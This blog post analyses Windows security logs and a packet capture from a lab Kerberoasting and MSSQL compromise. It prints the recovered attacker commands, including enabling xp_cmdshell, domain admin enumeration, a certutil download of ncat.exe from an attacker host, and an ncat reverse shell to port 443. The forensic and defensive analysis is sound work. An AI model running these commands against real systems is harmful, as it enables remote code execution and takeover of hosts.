Sunday, January 2, 2022

Analyzing the logs and packets from a post Kerberoasting activity

In the previous post, I did the Kerberoasting attack. The log entry at the time of running impacket-mssqlclient did not show me anything that I thought was immediately interesting. Actually it instead surprised me. I was really hoping to see information such as the Workstation Name, Source Network Address, Source Port. Especially when the Logon Type is reported as 3 below.

An account was successfully logged on.

Subject:
	Security ID:		NULL SID
	Account Name:		-
	Account Domain:		-
	Logon ID:		0x0

Logon Information:
	Logon Type:		3
	Restricted Admin Mode:	-
	Virtual Account:		No
	Elevated Token:		Yes

Impersonation Level:		Impersonation

New Logon:
	Security ID:		SECURITYNIK\sql-service
	Account Name:		sql-service
	Account Domain:		SECURITYNIK
	Logon ID:		0x4F4F11
	Linked Logon ID:		0x0
	Network Account Name:	-
	Network Account Domain:	-
	Logon GUID:		{00000000-0000-0000-0000-000000000000}

Process Information:
	Process ID:		0x0
	Process Name:		-

Network Information:
	Workstation Name:	-
	Source Network Address:	-
	Source Port:		-

Detailed Authentication Information:
	Logon Process:		NtLmSsp 
	Authentication Package:	NTLM
	Transited Services:	-
	Package Name (NTLM only):	NTLM V2
	Key Length:		0

This event is generated when a logon session is created. It is generated on the computer that was accessed.
...

Looking at another entry did peek my interest though. Why would sqlservr.exe be spawning cmd.exe with command line "C:\Windows\system32\cmd.exe" /c whoami. This is definitely more interesting than the above entry.

A new process has been created.

Creator Subject:
	Security ID:		NT SERVICE\MSSQL$SQLEXPRESS
	Account Name:		MSSQL$SQLEXPRESS
	Account Domain:		NT Service
	Logon ID:		0x1718F

Target Subject:
	Security ID:		NULL SID
	Account Name:		-
	Account Domain:		-
	Logon ID:		0x0

Process Information:
	New Process ID:		0x123c
	New Process Name:	C:\Windows\System32\cmd.exe
	Token Elevation Type:	%%1936
	Mandatory Label:		Mandatory Label\High Mandatory Level
	Creator Process ID:	0xa04
	Creator Process Name:	C:\Program Files\Microsoft SQL Server\MSSQL13.SQLEXPRESS\MSSQL\Binn\sqlservr.exe
	Process Command Line:	"C:\Windows\system32\cmd.exe" /c whoami

Next up, we see cmd.exe executing the whoami.

A new process has been created.

Creator Subject:
	Security ID:		NT SERVICE\MSSQL$SQLEXPRESS
	Account Name:		MSSQL$SQLEXPRESS
	Account Domain:		NT Service
	Logon ID:		0x1718F

Target Subject:
	Security ID:		NULL SID
	Account Name:		-
	Account Domain:		-
	Logon ID:		0x0

Process Information:
	New Process ID:		0x1724
	New Process Name:	C:\Windows\System32\whoami.exe
	Token Elevation Type:	%%1936
	Mandatory Label:		Mandatory Label\High Mandatory Level
	Creator Process ID:	0x123c
	Creator Process Name:	C:\Windows\System32\cmd.exe
	Process Command Line:	whoami

Here we see the Domain Admins group being enumerated.

A new process has been created.

Creator Subject:
	Security ID:		NT SERVICE\MSSQL$SQLEXPRESS
	Account Name:		MSSQL$SQLEXPRESS
	Account Domain:		NT Service
	Logon ID:		0x1718F

Target Subject:
	Security ID:		NULL SID
	Account Name:		-
	Account Domain:		-
	Logon ID:		0x0

Process Information:
	New Process ID:		0x360
	New Process Name:	C:\Windows\System32\cmd.exe
	Token Elevation Type:	%%1936
	Mandatory Label:		Mandatory Label\High Mandatory Level
	Creator Process ID:	0xa04
	Creator Process Name:	C:\Program Files\Microsoft SQL Server\MSSQL13.SQLEXPRESS\MSSQL\Binn\sqlservr.exe
	Process Command Line:	"C:\Windows\system32\cmd.exe" /c net groups "Domain Admins"

Here we see the hosts downloading ncat.exe via Certutil.

A new process has been created.

Creator Subject:
	Security ID:		NT SERVICE\MSSQL$SQLEXPRESS
	Account Name:		MSSQL$SQLEXPRESS
	Account Domain:		NT Service
	Logon ID:		0x1718F

Target Subject:
	Security ID:		NULL SID
	Account Name:		-
	Account Domain:		-
	Logon ID:		0x0

Process Information:
	New Process ID:		0x1598
	New Process Name:	C:\Windows\System32\cmd.exe
	Token Elevation Type:	%%1936
	Mandatory Label:		Mandatory Label\High Mandatory Level
	Creator Process ID:	0xa04
	Creator Process Name:	C:\Program Files\Microsoft SQL Server\MSSQL13.SQLEXPRESS\MSSQL\Binn\sqlservr.exe
	Process Command Line:	"C:\Windows\system32\cmd.exe" /c certutil -URLCache -F http://10.0.0.107/ncat.exe %TEMP%\ncat.exe

Here is what it looked like when the ncat was executed.

A new process has been created.

Creator Subject:
	Security ID:		NT SERVICE\MSSQL$SQLEXPRESS
	Account Name:		MSSQL$SQLEXPRESS
	Account Domain:		NT Service
	Logon ID:		0x1718F

Target Subject:
	Security ID:		NULL SID
	Account Name:		-
	Account Domain:		-
	Logon ID:		0x0

Process Information:
	New Process ID:		0xc6c
	New Process Name:	C:\Windows\SERVIC~1\MSSQL$~1\AppData\Local\Temp\ncat.exe
	Token Elevation Type:	%%1936
	Mandatory Label:		Mandatory Label\High Mandatory Level
	Creator Process ID:	0x1578
	Creator Process Name:	C:\Windows\System32\cmd.exe
	Process Command Line:	C:\Windows\SERVIC~1\MSSQL$~1\AppData\Local\Temp\ncat.exe  10.0.0.107 443 --ssl --exec cmd.exe

While I was looking at the logs to see what transpired, I was also capturing packets using the following:

┌──(rootđź’€securitynik)-[~/packets]
└─# tcpdump -nnt --interface eth0 -w impacket-sql.pcap '(host 10.0.0.5) and not(arp or ip6 or port(1900))' -vv
tcpdump: listening on eth0, link-type EN10MB (Ethernet), snapshot length 262144 bytes
^C2841 packets captured
2841 packets received by filter
0 packets dropped by kernel

Interestingly, I thought most of the communication was encrypted but I was wrong. As I looked at a few packets, I could see the queries I executed.

Looking at the type of packets captured.

┌──(rootđź’€securitynik)-[~/packets]
└─# tshark -n -r impacket-sql.pcap -q -z io,phs

===================================================================
Protocol Hierarchy Statistics
Filter: 

eth                                      frames:2841 bytes:4068111
  ip                                     frames:2841 bytes:4068111
    tcp                                  frames:2835 bytes:4066653
      tds                                frames:90 bytes:460551
        _ws.malformed                    frames:7 bytes:2500
        tcp.segments                     frames:2 bytes:12052
      tds.prelogin                       frames:1 bytes:320
        tds.prelogin                     frames:1 bytes:320
      data                               frames:135 bytes:8100
      http                               frames:4 bytes:11948
        media                            frames:2 bytes:11564
          tcp.segments                   frames:2 bytes:11564
      tls                                frames:827 bytes:121673
    udp                                  frames:6 bytes:1458
      nbdgm                              frames:6 bytes:1458
        smb                              frames:6 bytes:1458
          mailslot                       frames:6 bytes:1458
            browser                      frames:6 bytes:1458
===================================================================

Looking at the tds messages, first up the "type == 1"

┌──(rootđź’€securitynik)-[~/packets]
└─# tshark -n -r impacket-sql.pcap -Y 'tds.type == 1'
   20   9.933875   10.0.0.107 → 10.0.0.5     TDS 316 SQL batch
   24  17.281790   10.0.0.107 → 10.0.0.5     TDS 132 SQL batch
   92 973.952996   10.0.0.107 → 10.0.0.5     TDS 170 SQL batch
   96 981.491834   10.0.0.107 → 10.0.0.5     TDS 168 SQL batch
  100 987.357432   10.0.0.107 → 10.0.0.5     TDS 132 SQL batch
  104 996.015944   10.0.0.107 → 10.0.0.5     TDS 138 SQL batch
  ....

Looking at some of the responses, "type == 4"

┌──(rootđź’€securitynik)-[~/packets]
└─# tshark -n -r impacket-sql.pcap -Y 'tds.type == 4'
    6   0.101021     10.0.0.5 → 10.0.0.107   TDS 91 Response
   15   0.111340     10.0.0.5 → 10.0.0.107   TDS 333 Response[Malformed Packet]
   17   0.129048     10.0.0.5 → 10.0.0.107   TDS 473 Response
   22  10.135335     10.0.0.5 → 10.0.0.107   TDS 666 Response
   26  17.489552     10.0.0.5 → 10.0.0.107   TDS 173 Response
   94 974.032998     10.0.0.5 → 10.0.0.107   TDS 294 Response
  ....

Looking at some of these messages, I see the commands I executed.

┌──(rootđź’€securitynik)-[~/packets]
└─# tshark -n -r impacket-sql.pcap -Y '(tds.type == 1) || (tds.type == 4)' -T fields -e tds.type -e tds.query -E header=y | moreRunning as user "root" and group "root". This could be dangerous.
tds.type        tds.query
4
4
4
1       exec master.dbo.sp_configure 'show advanced options',1;RECONFIGURE;exec master.dbo.sp_configure 'xp_cmdshell', 1;RECONFI
GURE;\r\n
4
1       exec master..xp_cmdshell 'whoami'\r\n
1       exec master..xp_cmdshell 'net users'\r\n
1       exec master..xp_cmdshell 'net groups "Domain Admins"'\r\n
1       exec master..xp_cmdshell 'certutil -URLCache -F http://10.0.0.107/ncat.exe %TEMP%\ncat.exe'\r\n
1       exec master..xp_cmdshell 'cmd.exe /c "%temp%\ncat.exe 10.0.0.107 443 --ssl --exec cmd.exe"'\r\n

I was able to see the responses also. However, in most cases it does not really make sense to post them here.

Ok, that's it for me and this post.

No comments:

Post a Comment